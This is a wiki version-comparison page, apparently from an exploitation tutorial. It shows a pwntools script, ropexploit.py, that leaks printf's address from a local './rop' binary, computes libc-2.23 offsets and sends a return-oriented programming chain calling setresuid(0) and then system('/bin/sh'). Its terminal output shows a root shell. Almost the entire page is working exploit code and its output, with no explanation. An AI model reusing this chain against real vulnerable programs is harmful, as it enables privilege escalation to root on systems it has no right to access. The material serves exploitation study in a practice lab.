Versions Compared

Old Version 3

changes.mady.by.user Lazenca.0x0

Saved on

compared with

New Version Current

changes.mady.by.user Lazenca.0x0

Saved on

Key

  • This line was added.
  • This line was removed.
  • Formatting was changed.

...

Code Block
languagepy
titleropexploit.py
from pwn import *
from struct import *

#context.log_level = 'debug'

#64bit OS - /lib/x86_64-linux-gnu/libc-2.23.so 
libcbase_printf_offset = 0x55800 
libcbase_system_offset = 0x45390
libcbase_setresuid_offset = 0xcd570 

binsh_offset = 0x18cd57
 
pop_rdi_ret = 0x400843 
pop_rsi_ret = 0x400841 
pop_rdx_ret_offset = 0x1150c9 

r = process('./rop')

r.recvn(10)
r.recvuntil('Printf() address : ')
libcbase = int(r.recvuntil('\n'),16)
libcbase -= libcbase_printf_offset

payload = "A"*72
payload += p64(pop_rdi_ret)
payload += p64(0)
payload += p64(libcbase + pop_rdx_ret_offset)
payload += p64(0)
payload += p64(0)
payload += p64(libcbase + libcbase_setresuid_offset)

payload += p64(pop_rdi_ret)
payload += p64(libcbase + binsh_offset)
payload += p64(libcbase + libcbase_system_offset)

r.send(payload)

r.interactive()
Code Block
titlepython rop.py
lazenca0x0@ubuntu:~/Exploit/ROP$ python ropexploit.py
[+] Starting local process './rop': pid 5698
[*] Switching to interactive mode
$ id
uid=0(root) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
$

Related site

  • N/a

Comments

Panel